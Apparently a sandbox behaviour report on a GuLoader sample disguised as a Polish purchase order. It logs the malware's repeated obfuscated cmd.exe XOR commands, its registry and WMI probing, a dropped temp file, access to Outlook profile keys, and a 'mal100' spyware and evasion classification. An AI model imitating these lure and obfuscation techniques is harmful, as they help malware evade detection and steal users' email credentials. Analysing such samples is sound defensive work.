Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x0E^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7F^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x71^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x2E^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x71^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x39^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x26^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7F^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x3B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x05^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x2E^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x67^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"	Jump to behavior

Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe

1_2_004030D9

Source: C:\Windows\SysWOW64\cmd.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe

File created: C:\Users\user\Pacifisterne

Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe

File created: C:\Users\user\AppData\Local\Temp\nsw80C6.tmp

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@400/11@3/3

Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe

Code function: 1_2_0040205E LdrInitializeThunk,CoCreateInstance,MultiByteToWideChar,LdrInitializeThunk,

1_2_0040205E

Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe

File read: C:\Users\desktop.ini

Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe

Code function: 1_2_0040431C GetDlgItem,SetWindowTextA,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,LdrInitializeThunk,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

1_2_0040431C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4792:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4792:120:WilError_03

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Obfuscated command line found

Source: Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Data Obfuscation

Yara detected GuLoader

